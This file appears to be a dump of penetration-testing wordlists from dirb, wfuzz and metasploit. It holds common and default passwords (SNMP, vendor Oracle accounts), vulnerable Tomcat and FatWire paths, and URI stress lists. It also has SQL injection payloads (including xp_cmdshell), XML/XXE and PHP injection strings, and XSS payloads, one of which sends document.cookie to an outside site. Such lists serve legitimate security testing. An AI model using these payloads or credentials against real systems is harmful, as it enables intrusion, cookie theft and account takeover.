73 | proxy 74 | pulse 75 | rfindd 76 | rje 77 | root 78 | rooty 79 | saned 80 | service 81 | setup 82 | sgiweb 83 | sigver 84 | speech-dispatcher 85 | sshd 86 | sym 87 | symop 88 | sync 89 | sys 90 | sysadm 91 | sysadmin 92 | sysbin 93 | syslog 94 | system_admin 95 | trouble 96 | udadmin 97 | ultra 98 | umountfs 99 | umountfsys 100 | umountsys 101 | unix 102 | us_admin 103 | user 104 | uucp 105 | uucpadm 106 | web 107 | webmaster 108 | www 109 | www-data 110 | xpdb 111 | xpopr 112 | zabbix 113 | vagrant 114 | -------------------------------------------------------------------------------- /wordlists/dirb/others/best110.txt: -------------------------------------------------------------------------------- 1 | 000000 2 | 111111 3 | 123123 4 | 123321 5 | 1234 6 | 12345 7 | 123456 8 | 1234567 9 | 12345678 10 | 123456789 11 | 1234567890 12 | 123abc 13 | 654321 14 | 666666 15 | 696969 16 | aaaaaa 17 | abc123 18 | alberto 19 | alejandra 20 | alejandro 21 | amanda 22 | andrea 23 | angel 24 | angels 25 | anthony 26 | asdf 27 | asdfasdf 28 | ashley 29 | babygirl 30 | baseball 31 | basketball 32 | beatriz 33 | blahblah 34 | bubbles 35 | buster 36 | butterfly 37 | carlos 38 | charlie 39 | cheese 40 | chocolate 41 | computer 42 | daniel 43 | diablo 44 | dragon 45 | elite 46 | estrella 47 | flower 48 | football 49 | forum 50 | freedom 51 | friends 52 | fuckyou 53 | hello 54 | hunter 55 | iloveu 56 | iloveyou 57 | internet 58 | jennifer 59 | jessica 60 | jesus 61 | jordan 62 | joshua 63 | justin 64 | killer 65 | letmein 66 | liverpool 67 | lovely 68 | loveme 69 | loveyou 70 | master 71 | matrix 72 | merlin 73 | monkey 74 | mustang 75 | nicole 76 | nothing 77 | number1 78 | pass 79 | passport 80 | password 81 | password1 82 | playboy 83 | pokemon 84 | pretty 85 | princess 86 | purple 87 | pussy 88 | qazwsx 89 | qwerty 90 | roberto 91 | sebastian 92 | secret 93 | shadow 94 | shit 95 | soccer 96 | starwars 97 | sunshine 98 | superman 99 | tequiero 100 | test 101 | testing 102 | trustno1 103 | tweety 104 | welcome 105 | westside 106 | whatever 107 | windows 108 | writer 109 | zxcvbnm 110 | zxczxc 111 | -------------------------------------------------------------------------------- /wordlists/wfuzz/Injections/XML.txt: -------------------------------------------------------------------------------- 1 | count(/child::node()) 2 | x' or name()='username' or 'x'='y 3 | ','')); phpinfo(); exit;/* 4 | var n=0;while(true){n++;}]]> 5 | SCRIPT]]>alert('XSS');/SCRIPT]]> 6 | SCRIPT]]>alert('XSS');/SCRIPT]]> 7 | 8 | ]>&xxe; 9 | ]>&xxe; 10 | ]>&xxe; 11 | ]>&xxe; 12 | ]]> 13 | <IMG SRC="javascript:alert('XSS')"> 14 | 15 | XSS 16 | -------------------------------------------------------------------------------- /wordlists/metasploit/snmp_default_pass.txt: -------------------------------------------------------------------------------- 1 | public 2 | private 3 | 0 4 | 0392a0 5 | 1234 6 | 2read 7 | 4changes 8 | ANYCOM 9 | Admin 10 | C0de 11 | CISCO 12 | CR52401 13 | IBM 14 | ILMI 15 | Intermec 16 | NoGaH$@! 17 | OrigEquipMfr 18 | PRIVATE 19 | PUBLIC 20 | Private 21 | Public 22 | SECRET 23 | SECURITY 24 | SNMP 25 | SNMP_trap 26 | SUN 27 | SWITCH 28 | SYSTEM 29 | Secret 30 | Security 31 | Switch 32 | System 33 | TENmanUFactOryPOWER 34 | TEST 35 | access 36 | adm 37 | admin 38 | agent 39 | agent_steal 40 | all 41 | all private 42 | all public 43 | apc 44 | bintec 45 | blue 46 | c 47 | cable-docsis 48 | canon_admin 49 | cc 50 | cisco 51 | community 52 | core 53 | debug 54 | default 55 | dilbert 56 | enable 57 | field 58 | field-service 59 | freekevin 60 | fubar 61 | guest 62 | hello 63 | hp_admin 64 | ibm 65 | ilmi 66 | intermec 67 | internal 68 | l2 69 | l3 70 | manager 71 | mngt 72 | monitor 73 | netman 74 | network 75 | none 76 | openview 77 | pass 78 | password 79 | pr1v4t3 80 | proxy 81 | publ1c 82 | read 83 | read-only 84 | read-write 85 | readwrite 86 | red 87 | regional 88 | rmon 89 | rmon_admin 90 | ro 91 | root 92 | router 93 | rw 94 | rwa 95 | s!a@m#n$p%c 96 | san-fran 97 | sanfran 98 | scotty 99 | secret 100 | security 101 | seri 102 | snmp 103 | snmpd 104 | snmptrap 105 | solaris 106 | sun 107 | superuser 108 | switch 109 | system 110 | tech 111 | test 112 | test2 113 | tiv0li 114 | tivoli 115 | trap 116 | world 117 | write 118 | xyzzy 119 | yellow 120 | 121 | -------------------------------------------------------------------------------- /wordlists/metasploit/hci_oracle_passwords.csv: -------------------------------------------------------------------------------- 1 | 1,1,AMBU,hacschema 2 | 1,1,QUEUE_USER,qmanager 3 | 1,1,SYS,alLp0ver2 4 | 1,1,SYSTEM,urA7mvP 5 | 1,1,CHANGEMGR,datacontrol 6 | 1,1,CCDEV,ccdev 7 | 1,1,CCDBA,ccnulls 8 | 1,1,CCDATA,ccdata 9 | 1,1,CCFORMS,ccforms 10 | 1,1,CCINTERFACE,ccinterface 11 | 1,1,MCKHEO,mckheo 12 | 1,1,CCREL,ccrel 13 | 1,1,CCQUERY,ccquery 14 | 1,1,CDXWEB,winplu5 15 | 1,1,DRUG1,fdb3schema 16 | 1,1,DRUG2,fdb3schema 17 | 1,1,enc_ent,encent 18 | 1,1,ENT,entpazz 19 | 1,1,ENT_CONFIG,ent_configpazz 20 | 1,1,ADF,adfpazz 21 | 1,1,INF,infpazz 22 | 1,1,INF_CONFIG,inf_configpazz 23 | 1,1,SDM,sdmpazz 24 | 1,1,STRMADM,pazzw0rd 25 | 1,1,ENT_AUD,pazzw0rd 26 | 1,1,ENT_ARCH,pazzw0rd 27 | 1,1,POC_ARCH,pazzw0rd 28 | 1,1,POC_AQ,qmanager 29 | 1,1,INF_AQ,qmanager 30 | 1,1,DATAMGR,datamgr 31 | 1,1,CCUSER,bueno 32 | 1,1,ALERTS,monitorhca 33 | 1,1,HCALERTS,alertsuser 34 | 1,1,AM,ampazz 35 | 1,1,AM_AUD,pazzw0rd 36 | 1,1,AUD,audpazz 37 | 1,1,TMF,tmfpazz 38 | 1,1,MN,mnpazz 39 | 1,1,EH,ehpazz 40 | 1,1,NG,ngpazz 41 | 1,1,DM,dmpazz 42 | 1,1,DMTOOL,dmtoolpazz 43 | 1,1,STG_DMT,stg_dmtpazz 44 | 1,1,WRL,wrlpazz 45 | 1,1,NOTES,notespazz 46 | 1,1,REPORTS,reportspazz 47 | 1,1,ICONS,iconspazz 48 | 1,1,BS,bspazz 49 | 1,1,QZ,qzpazz 50 | 1,1,RM,rmpazz 51 | 1,1,RM_AUD,pazzw0rd 52 | 1,1,COMMGR,commgrpazz 53 | 1,1,OPSERVICE,opservicepazz 54 | 1,1,SEC_CONFIG,sec_configpazz 55 | 1,1,CTXSYS,ctxsyspazz 56 | 1,1,OLOGY,ologypazz 57 | 1,1,OLOGY_CONFIG,ology_configpazz 58 | 1,1,DOC,docpazz 59 | 1,1,DOC_CONFIG,doc_configpazz 60 | 1,1,PORTAL,portal 61 | 1,1,PORTAL_INSTALL,portal_install 62 | 1,1,EBIDBADMIN,ebidbadmin 63 | 1,1,DESIGN_OWNER,owb 64 | 1,1,OWB_RUNTIME_REPOSITORY,owb 65 | 1,1,RUNTIME_A_USER,owb 66 | -------------------------------------------------------------------------------- /wordlists/wfuzz/vulns/tomcat.txt: -------------------------------------------------------------------------------- 1 | examples 2 | examples/jsp/index.html 3 | examples/servlets/index.html 4 | examples/servlet/HelloWorldExample 5 | examples/servlet/org.apache.catalina.INVOKER.HelloWorldExample 6 | examples/servlet/snoop 7 | examples/servlet/SnoopServlet 8 | examples/servlet/org.apache.catalina.INVOKER.SnoopServlet 9 | examples/servlet/TroubleShooter 10 | examples/servlet/org.apache.catalina.INVOKER.TroubleShooter 11 | examples/jsp/snp/snoop.jsp 12 | examples/jsp/source.jsp 13 | servlet/default/ 14 | servlet/org.apache.catalina.servlets.DefaultServlet/ 15 | examples/servlet/default/jsp/snp/snoop.jsp 16 | examples/servlet/default/jsp/source.jsp 17 | examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/snp/snoop.jsp 18 | examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/source.jsp 19 | manager 20 | tomcat-docs 21 | webdav 22 | webdav/index.html 23 | webdav/servlet/webdav/ 24 | webdav/servlet/org.apache.catalina.servlets.WebdavServlet/ 25 | servlet/org.apache.catalina.servlets.WebdavServlet/ 26 | servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.WebdavServlet/ 27 | examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/snp/snoop.jsp 28 | examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/source.jsp 29 | servlet/org.apache.catalina.servlets.SnoopAllServlet 30 | servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.SnoopAllServlet 31 | servlet/org.apache.catalina.servlets.ManagerServlet 32 | servlet/org.apache.catalina.servlets.HTMLManagerServlet 33 | servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.SnoopAllServlet 34 | servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif 35 | servlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif 36 | servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.DefaultServlet/tomcat.gif 37 | ?a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c=1 38 | -------------------------------------------------------------------------------- /wordlists/wfuzz/general/catala.txt: -------------------------------------------------------------------------------- 1 | acces 2 | activitats 3 | administracio 4 | afegir 5 | agafar 6 | agenda 7 | ajuda 8 | ajudes 9 | antic 10 | arrel 11 | article 12 | articles 13 | arxiu 14 | arxius 15 | borsa 16 | botiga 17 | bulleti 18 | bustia 19 | calaix 20 | campanyes 21 | capsalera 22 | carpeta 23 | cat 24 | catala 25 | cataleg 26 | catalegs 27 | categories 28 | celler 29 | cerca 30 | cercador 31 | claus 32 | client 33 | clients 34 | colleccio 35 | comunicacio 36 | confirmacio 37 | contingut 38 | continguts 39 | copia 40 | correu 41 | crida 42 | dades 43 | demamar 44 | demanas 45 | descarrega 46 | descarregues 47 | desenvolupament 48 | directori 49 | disseny 50 | document 51 | documentacio 52 | documents 53 | eines 54 | empreses 55 | enllacos 56 | entitats 57 | entorns 58 | esborrar 59 | escola 60 | externes 61 | finestra 62 | fitxer 63 | fitxers 64 | fonts 65 | formulari 66 | formularis 67 | forum 68 | forums 69 | gestio 70 | glossari 71 | historic 72 | imatge 73 | imatges 74 | informacio 75 | inici 76 | jocs 77 | lletres 78 | lleure 79 | llibres 80 | llista 81 | localitzador 82 | locals 83 | maquinari 84 | mitjans 85 | mostra 86 | mostres 87 | mot 88 | noticies 89 | nou 90 | novetats 91 | nul 92 | obrir 93 | operacio 94 | organitzacions 95 | pagines 96 | pas 97 | personals 98 | pestanya 99 | pestanyes 100 | peu 101 | porta 102 | primer 103 | principal 104 | privat 105 | programari 106 | projecte 107 | projectes 108 | prova 109 | proves 110 | public 111 | publicacions 112 | pujar 113 | recerca 114 | recull 115 | reculls 116 | registre 117 | registres 118 | salo 119 | seccio 120 | segon 121 | seguretat 122 | serveis 123 | sistemes 124 | sumari 125 | sumaris 126 | tasques 127 | taula 128 | tauler 129 | tecnic 130 | temes 131 | tercer 132 | titulars 133 | tot 134 | totes 135 | tots 136 | transit 137 | transmissio 138 | treballador 139 | treballadors 140 | usuari 141 | usuaris 142 | vell 143 | veure 144 | -------------------------------------------------------------------------------- /wordlists/wfuzz/Injections/SQL.txt: -------------------------------------------------------------------------------- 1 | ' 2 | " 3 | # 4 | - 5 | -- 6 | '%20-- 7 | --'; 8 | '%20; 9 | =%20' 10 | =%20; 11 | =%20-- 12 | \x23 13 | \x27 14 | \x3D%20\x3B' 15 | \x3D%20\x27 16 | \x27\x4F\x52 SELECT * 17 | \x27\x6F\x72 SELECT * 18 | 'or%20select * 19 | admin'-- 20 | <>"'%;)(&+ 21 | '%20or%20''=' 22 | '%20or%20'x'='x 23 | "%20or%20"x"="x 24 | ')%20or%20('x'='x 25 | 0 or 1=1 26 | ' or 0=0 -- 27 | " or 0=0 -- 28 | or 0=0 -- 29 | ' or 0=0 # 30 | " or 0=0 # 31 | or 0=0 # 32 | ' or 1=1-- 33 | " or 1=1-- 34 | ' or '1'='1'-- 35 | "' or 1 --'" 36 | or 1=1-- 37 | or%201=1 38 | or%201=1 -- 39 | ' or 1=1 or ''=' 40 | " or 1=1 or ""=" 41 | ' or a=a-- 42 | " or "a"="a 43 | ') or ('a'='a 44 | ") or ("a"="a 45 | hi" or "a"="a 46 | hi" or 1=1 -- 47 | hi' or 1=1 -- 48 | hi' or 'a'='a 49 | hi') or ('a'='a 50 | hi") or ("a"="a 51 | 'hi' or 'x'='x'; 52 | @variable 53 | ,@variable 54 | PRINT 55 | PRINT @@variable 56 | select 57 | insert 58 | as 59 | or 60 | procedure 61 | limit 62 | order by 63 | asc 64 | desc 65 | delete 66 | update 67 | distinct 68 | having 69 | truncate 70 | replace 71 | like 72 | handler 73 | bfilename 74 | ' or username like '% 75 | ' or uname like '% 76 | ' or userid like '% 77 | ' or uid like '% 78 | ' or user like '% 79 | exec xp 80 | exec sp 81 | '; exec master..xp_cmdshell 82 | '; exec xp_regread 83 | t'exec master..xp_cmdshell 'nslookup www.google.com'-- 84 | --sp_password 85 | \x27UNION SELECT 86 | ' UNION SELECT 87 | ' UNION ALL SELECT 88 | ' or (EXISTS) 89 | ' (select top 1 90 | '||UTL_HTTP.REQUEST 91 | 1;SELECT%20* 92 | to_timestamp_tz 93 | tz_offset 94 | <>"'%;)(&+ 95 | '%20or%201=1 96 | %27%20or%201=1 97 | %20$(sleep%2050) 98 | %20'sleep%2050' 99 | char%4039%41%2b%40SELECT 100 | '%20OR 101 | 'sqlattempt1 102 | (sqlattempt2) 103 | | 104 | %7C 105 | *| 106 | %2A%7C 107 | *(|(mail=*)) 108 | %2A%28%7C%28mail%3D%2A%29%29 109 | *(|(objectclass=*)) 110 | %2A%28%7C%28objectclass%3D%2A%29%29 111 | ( 112 | %28 113 | ) 114 | %29 115 | & 116 | %26 117 | ! 118 | %21 119 | ' or 1=1 or ''=' 120 | ' or ''=' 121 | x' or 1=1 or 'x'='y 122 | / 123 | // 124 | //* 125 | */* 126 | -------------------------------------------------------------------------------- /wordlists/dirb/catala.txt: -------------------------------------------------------------------------------- 1 | a 2 | acces 3 | activitats 4 | actualitat 5 | administracio 6 | afegir 7 | agafar 8 | agenda 9 | ajuda 10 | ajudes 11 | antic 12 | arrel 13 | article 14 | articles 15 | arxiu 16 | arxius 17 | aule 18 | aules 19 | avaluacio 20 | borsa 21 | botiga 22 | bulleti 23 | bustia 24 | calaix 25 | campanyes 26 | capsalera 27 | carpeta 28 | cat 29 | catala 30 | cataleg 31 | catalegs 32 | categories 33 | celler 34 | cerca 35 | cercador 36 | claus 37 | client 38 | clients 39 | colleccio 40 | comunicacio 41 | comunitat 42 | confirmacio 43 | contingut 44 | continguts 45 | copia 46 | correu 47 | crida 48 | dades 49 | demamar 50 | demanas 51 | descarrega 52 | descarregues 53 | desenvolupament 54 | directori 55 | disseny 56 | document 57 | documentacio 58 | documents 59 | eines 60 | empreses 61 | enllacos 62 | entitats 63 | entorns 64 | esborrar 65 | escola 66 | estudiant 67 | externes 68 | finestra 69 | fitxer 70 | fitxers 71 | fonts 72 | formulari 73 | formularis 74 | forum 75 | forums 76 | gestio 77 | glossari 78 | historic 79 | imatge 80 | imatges 81 | informacio 82 | inici 83 | institucio 84 | jocs 85 | lletres 86 | lleure 87 | llibres 88 | llista 89 | localitzador 90 | locals 91 | maquinari 92 | meu 93 | mitjans 94 | modul 95 | moduls 96 | mostra 97 | mostres 98 | mot 99 | navegacio 100 | noticies 101 | nou 102 | novetats 103 | nul 104 | obrir 105 | operacio 106 | organitzacions 107 | pagines 108 | pas 109 | personals 110 | pestanya 111 | pestanyes 112 | peu 113 | porta 114 | primer 115 | principal 116 | privat 117 | programari 118 | projecte 119 | projectes 120 | prova 121 | proves 122 | public 123 | publicacions 124 | pujar 125 | recerca 126 | recre 127 | recull 128 | reculls 129 | registre 130 | registres 131 | salo 132 | seccio 133 | secretaria 134 | segon 135 | seguretat 136 | serveis 137 | sistemes 138 | sumari 139 | sumaris 140 | tasques 141 | taula 142 | tauler 143 | tecnic 144 | temes 145 | tercer 146 | titulars 147 | tot 148 | totes 149 | tots 150 | transit 151 | transmissio 152 | treballador 153 | treballadors 154 | tren 155 | trenacc 156 | usuari 157 | usuaris 158 | vell 159 | veure 160 | xarxa 161 | xarxas 162 | -------------------------------------------------------------------------------- /wordlists/dirb/vulns/fatwire.txt: -------------------------------------------------------------------------------- 1 | Admin 2 | BlobServer 3 | #CacheServer 4 | CatalogManager 5 | ContentServer 6 | CookieServer 7 | DebugServer 8 | Dev 9 | DispatchManager 10 | EvalServer 11 | FlushServer 12 | HelloCS 13 | Inventory 14 | LoginPage 15 | LoginPage.html 16 | PageDispatchServer 17 | Satellite 18 | SeedDispatchServer 19 | SyncSeedDispatchServer 20 | TreeManager 21 | Xcelerate 22 | Xcelerate 23 | Xcelerate/Admin/LoginPage.html 24 | Xcelerate/DownloadPage.html 25 | Xcelerate/LoginPage.html 26 | Xcelerate/SampleSites.html 27 | adminforms 28 | adminforms.html 29 | analytics 30 | analytics/login.jsp 31 | analytics/services/AnalyticsWebService 32 | analytics/statistics 33 | assetmaker 34 | contentserver 35 | cs 36 | cs/BlobServer 37 | #cs/CacheServer 38 | cs/CatalogManager 39 | cs/ContentServer 40 | cs/CookieServer 41 | cs/DebugServer 42 | cs/DispatchManager 43 | cs/EvalServer 44 | cs/FlushServer 45 | cs/HelloCS 46 | cs/Inventory 47 | cs/PageDispatchServer 48 | cs/Satellite 49 | cs/SeedDispatchServer 50 | cs/SyncSeedDispatchServer 51 | cs/TreeManager 52 | cs_deployed 53 | cstest.html 54 | divine 55 | eWebEditPro 56 | eWebEditPro/dynamic_config.asp 57 | eWebEditPro/ewebeditpro.asp 58 | eWebEditPro/ewebeditpro.aspx 59 | eWebEditPro/ewebeditpro.htm 60 | eWebEditPro/ewebeditpro.jsp 61 | eWebEditPro/ewebeditpro.php 62 | eWebEditPro/ewebeditpro4.cfm 63 | eWebEditPro/ewebeditprouploadfile.cfm 64 | eWebEditPro/index.htm 65 | eWebEditPro/index.html 66 | eWebEditPro/ewepreceive.asp 67 | eWebEditPro/samplepage.htm 68 | eWebEditPro/config.xml 69 | eWebEditPro/test.htm 70 | fatwire 71 | form.html 72 | futuretense 73 | futuretense_cs 74 | futuretense_cs/adminforms.html 75 | init.html 76 | jsp 77 | jsp/cs_deployed 78 | jsp/index.html 79 | login.html 80 | mirror.html 81 | newtable.html 82 | openmarket 83 | retrieve.html 84 | servlet 85 | servlet/BlobServer 86 | servlet/CacheServer 87 | servlet/CatalogManager 88 | servlet/ContentServer 89 | servlet/CookieServer 90 | servlet/DebugServer 91 | servlet/DispatchManager 92 | servlet/EvalServer 93 | servlet/FlushServer 94 | servlet/HelloCS 95 | servlet/Inventory 96 | servlet/PageDispatchServer 97 | servlet/Satellite 98 | servlet/SeedDispatchServer 99 | servlet/SyncSeedDispatchServer 100 | servlet/TreeManager 101 | xcelerate 102 | -------------------------------------------------------------------------------- /wordlists/dirb/stress/uri_hex.txt: -------------------------------------------------------------------------------- 1 | %00 2 | %01 3 | %02 4 | %03 5 | %04 6 | %05 7 | %06 8 | %07 9 | %08 10 | %09 11 | %0a 12 | %0b 13 | %0c 14 | %0d 15 | %0e 16 | %0f 17 | %10 18 | %11 19 | %12 20 | %13 21 | %14 22 | %15 23 | %16 24 | %17 25 | %18 26 | %19 27 | %1a 28 | %1b 29 | %1c 30 | %1d 31 | %1e 32 | %1f 33 | %20 34 | %21 35 | %22 36 | %23 37 | %24 38 | %25 39 | %26 40 | %27 41 | %28 42 | %29 43 | %2a 44 | %2b 45 | %2c 46 | %2d 47 | %2e 48 | %2f 49 | %30 50 | %31 51 | %32 52 | %33 53 | %34 54 | %35 55 | %36 56 | %37 57 | %38 58 | %39 59 | %3a 60 | %3b 61 | %3c 62 | %3d 63 | %3e 64 | %3f 65 | %40 66 | %41 67 | %42 68 | %43 69 | %44 70 | %45 71 | %46 72 | %47 73 | %48 74 | %49 75 | %4a 76 | %4b 77 | %4c 78 | %4d 79 | %4e 80 | %4f 81 | %50 82 | %51 83 | %52 84 | %53 85 | %54 86 | %55 87 | %56 88 | %57 89 | %58 90 | %59 91 | %5a 92 | %5b 93 | %5c 94 | %5d 95 | %5e 96 | %5f 97 | %60 98 | %61 99 | %62 100 | %63 101 | %64 102 | %65 103 | %66 104 | %67 105 | %68 106 | %69 107 | %6a 108 | %6b 109 | %6c 110 | %6d 111 | %6e 112 | %6f 113 | %70 114 | %71 115 | %72 116 | %73 117 | %74 118 | %75 119 | %76 120 | %77 121 | %78 122 | %79 123 | %7a 124 | %7b 125 | %7c 126 | %7d 127 | %7e 128 | %7f 129 | %80 130 | %81 131 | %82 132 | %83 133 | %84 134 | %85 135 | %86 136 | %87 137 | %88 138 | %89 139 | %8a 140 | %8b 141 | %8c 142 | %8d 143 | %8e 144 | %8f 145 | %90 146 | %91 147 | %92 148 | %93 149 | %94 150 | %95 151 | %96 152 | %97 153 | %98 154 | %99 155 | %9a 156 | %9b 157 | %9c 158 | %9d 159 | %9e 160 | %9f 161 | %a0 162 | %a1 163 | %a2 164 | %a3 165 | %a4 166 | %a5 167 | %a6 168 | %a7 169 | %a8 170 | %a9 171 | %aa 172 | %ab 173 | %ac 174 | %ad 175 | %ae 176 | %af 177 | %b0 178 | %b1 179 | %b2 180 | %b3 181 | %b4 182 | %b5 183 | %b6 184 | %b7 185 | %b8 186 | %b9 187 | %ba 188 | %bb 189 | %bc 190 | %bd 191 | %be 192 | %bf 193 | %c0 194 | %c1 195 | %c2 196 | %c3 197 | %c4 198 | %c5 199 | %c6 200 | %c7 201 | %c8 202 | %c9 203 | %ca 204 | %cb 205 | %cc 206 | %cd 207 | %ce 208 | %cf 209 | %d0 210 | %d1 211 | %d2 212 | %d3 213 | %d4 214 | %d5 215 | %d6 216 | %d7 217 | %d8 218 | %d9 219 | %da 220 | %db 221 | %dc 222 | %dd 223 | %de 224 | %df 225 | %e0 226 | %e1 227 | %e2 228 | %e3 229 | %e4 230 | %e5 231 | %e6 232 | %e7 233 | %e8 234 | %e9 235 | %ea 236 | %eb 237 | %ec 238 | %ed 239 | %ee 240 | %ef 241 | %f0 242 | %f1 243 | %f2 244 | %f3 245 | %f4 246 | %f5 247 | %f6 248 | %f7 249 | %f8 250 | %f9 251 | %fa 252 | %fb 253 | %fc 254 | %fd 255 | %fe 256 | %ff 257 | -------------------------------------------------------------------------------- /wordlists/wfuzz/stress/uri_hex.txt: -------------------------------------------------------------------------------- 1 | %00 2 | %01 3 | %02 4 | %03 5 | %04 6 | %05 7 | %06 8 | %07 9 | %08 10 | %09 11 | %0a 12 | %0b 13 | %0c 14 | %0d 15 | %0e 16 | %0f 17 | %10 18 | %11 19 | %12 20 | %13 21 | %14 22 | %15 23 | %16 24 | %17 25 | %18 26 | %19 27 | %1a 28 | %1b 29 | %1c 30 | %1d 31 | %1e 32 | %1f 33 | %20 34 | %21 35 | %22 36 | %23 37 | %24 38 | %25 39 | %26 40 | %27 41 | %28 42 | %29 43 | %2a 44 | %2b 45 | %2c 46 | %2d 47 | %2e 48 | %2f 49 | %30 50 | %31 51 | %32 52 | %33 53 | %34 54 | %35 55 | %36 56 | %37 57 | %38 58 | %39 59 | %3a 60 | %3b 61 | %3c 62 | %3d 63 | %3e 64 | %3f 65 | %40 66 | %41 67 | %42 68 | %43 69 | %44 70 | %45 71 | %46 72 | %47 73 | %48 74 | %49 75 | %4a 76 | %4b 77 | %4c 78 | %4d 79 | %4e 80 | %4f 81 | %50 82 | %51 83 | %52 84 | %53 85 | %54 86 | %55 87 | %56 88 | %57 89 | %58 90 | %59 91 | %5a 92 | %5b 93 | %5c 94 | %5d 95 | %5e 96 | %5f 97 | %60 98 | %61 99 | %62 100 | %63 101 | %64 102 | %65 103 | %66 104 | %67 105 | %68 106 | %69 107 | %6a 108 | %6b 109 | %6c 110 | %6d 111 | %6e 112 | %6f 113 | %70 114 | %71 115 | %72 116 | %73 117 | %74 118 | %75 119 | %76 120 | %77 121 | %78 122 | %79 123 | %7a 124 | %7b 125 | %7c 126 | %7d 127 | %7e 128 | %7f 129 | %80 130 | %81 131 | %82 132 | %83 133 | %84 134 | %85 135 | %86 136 | %87 137 | %88 138 | %89 139 | %8a 140 | %8b 141 | %8c 142 | %8d 143 | %8e 144 | %8f 145 | %90 146 | %91 147 | %92 148 | %93 149 | %94 150 | %95 151 | %96 152 | %97 153 | %98 154 | %99 155 | %9a 156 | %9b 157 | %9c 158 | %9d 159 | %9e 160 | %9f 161 | %a0 162 | %a1 163 | %a2 164 | %a3 165 | %a4 166 | %a5 167 | %a6 168 | %a7 169 | %a8 170 | %a9 171 | %aa 172 | %ab 173 | %ac 174 | %ad 175 | %ae 176 | %af 177 | %b0 178 | %b1 179 | %b2 180 | %b3 181 | %b4 182 | %b5 183 | %b6 184 | %b7 185 | %b8 186 | %b9 187 | %ba 188 | %bb 189 | %bc 190 | %bd 191 | %be 192 | %bf 193 | %c0 194 | %c1 195 | %c2 196 | %c3 197 | %c4 198 | %c5 199 | %c6 200 | %c7 201 | %c8 202 | %c9 203 | %ca 204 | %cb 205 | %cc 206 | %cd 207 | %ce 208 | %cf 209 | %d0 210 | %d1 211 | %d2 212 | %d3 213 | %d4 214 | %d5 215 | %d6 216 | %d7 217 | %d8 218 | %d9 219 | %da 220 | %db 221 | %dc 222 | %dd 223 | %de 224 | %df 225 | %e0 226 | %e1 227 | %e2 228 | %e3 229 | %e4 230 | %e5 231 | %e6 232 | %e7 233 | %e8 234 | %e9 235 | %ea 236 | %eb 237 | %ec 238 | %ed 239 | %ee 240 | %ef 241 | %f0 242 | %f1 243 | %f2 244 | %f3 245 | %f4 246 | %f5 247 | %f6 248 | %f7 249 | %f8 250 | %f9 251 | %fa 252 | %fb 253 | %fc 254 | %fd 255 | %fe 256 | %ff 257 | -------------------------------------------------------------------------------- /wordlists/wfuzz/Injections/XSS.txt: -------------------------------------------------------------------------------- 1 | "> 3 | < 4 | 5 | '> 6 | '> 7 | \";alert('XSS');// 8 | %3cscript%3ealert("WXSS");%3c/script%3e 9 | %3cscript%3ealert(document.cookie);%3c%2fscript%3e 10 | %3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E 11 | <script>alert(document.cookie); 12 | <script>alert(document.cookie);<script>alert 13 | 14 | 15 | 16 | 18 | 19 | 20 | 21 | "> 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | '%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E 36 | "> 37 | %22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E 38 | ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//>!--=&{} 39 | '';!--"=&{()} 40 | -------------------------------------------------------------------------------- /wordlists/dirb/euskera.txt: -------------------------------------------------------------------------------- 1 | adar 2 | adibide 3 | administrazio 4 | administrazioa 5 | agindu 6 | aginduen 7 | ahalegin 8 | ahots 9 | alde 10 | ale 11 | amaitu 12 | apurtu 13 | arauketa 14 | araututa 15 | argazki 16 | argitalpenak 17 | ari 18 | ariketa 19 | arin 20 | arma 21 | arrantz 22 | arrantza 23 | arrautza 24 | arrunta 25 | artxiboa 26 | askatuta 27 | asmatu 28 | ataria 29 | ate 30 | atera 31 | aupa 32 | aurkezpen 33 | aurkitu 34 | aurrera 35 | azken 36 | azter 37 | azterketa 38 | bai 39 | baliabide 40 | baliagarri 41 | banatua 42 | bateragarri 43 | baztertu 44 | begiratu 45 | berdin 46 | berezi 47 | berri 48 | besteak 49 | bete 50 | bidai 51 | bidaia 52 | bidali 53 | bihurtu 54 | bilatu 55 | bildu 56 | birtual 57 | blogak 58 | bota 59 | buelta 60 | bukatu 61 | bulego 62 | buzoia 63 | copyleft 64 | dastatu 65 | dataz 66 | dei 67 | deitu 68 | diaspora 69 | dohain 70 | dokumentuak 71 | dominioak 72 | ebaki 73 | egi 74 | egin 75 | egun 76 | egutegi 77 | egutegia 78 | elikatze 79 | elkarte 80 | enpresak 81 | erabili 82 | eragiketa 83 | eragile 84 | erakundeak 85 | erakutsi 86 | erantzun 87 | eredu 88 | erosi 89 | erosketa 90 | eroski 91 | erreala 92 | errez 93 | eskatu 94 | eskubi 95 | estatistikak 96 | euskara 97 | eutsi 98 | ez 99 | ezaguntz 100 | ezkutatu 101 | fitxategia 102 | foru 103 | gaizto 104 | galdera 105 | galdetu 106 | garrantzitsu 107 | gertu 108 | gestio 109 | gidak 110 | gizartea 111 | gogoratu 112 | gonbidatu 113 | gora 114 | gorde 115 | harrapatu 116 | hasi 117 | helbide 118 | herri 119 | hezkuntza 120 | hil 121 | hitz 122 | hizkuntza 123 | hosto 124 | igo 125 | ikasi 126 | ikur 127 | ikusi 128 | informazio 129 | interesgarri 130 | interlagunok 131 | irakurri 132 | ireki 133 | irekita 134 | irudikapen 135 | iturri 136 | itxaron 137 | itxi 138 | itxia 139 | itxita 